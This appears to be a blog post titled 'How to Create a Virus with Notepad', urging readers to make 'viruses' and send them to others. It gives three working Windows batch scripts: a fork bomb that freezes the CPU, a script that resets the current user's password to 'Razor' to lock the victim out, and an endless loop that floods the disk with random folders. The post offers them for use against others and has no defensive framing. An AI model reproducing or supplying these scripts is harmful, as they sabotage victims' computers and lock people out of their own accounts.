How to Create a Virus with Notepad 100% Working

                                        

                Hi I am share How to How to Create a Virus with Notepad  Its really working. Make Virus and sen 



How to Create your Own Virus using Batch Scripting

 

All code open notepad and save .bat file 


So lest start 

1 Freezes the CPU

  %0|%0
 save cpu.bat

1 Change Computer Password

@echo off
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::
 save anything.bat

Make an Infinity of Folders

@echo off
:ztuts
md %random%
goto ztuts
 

 

 

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.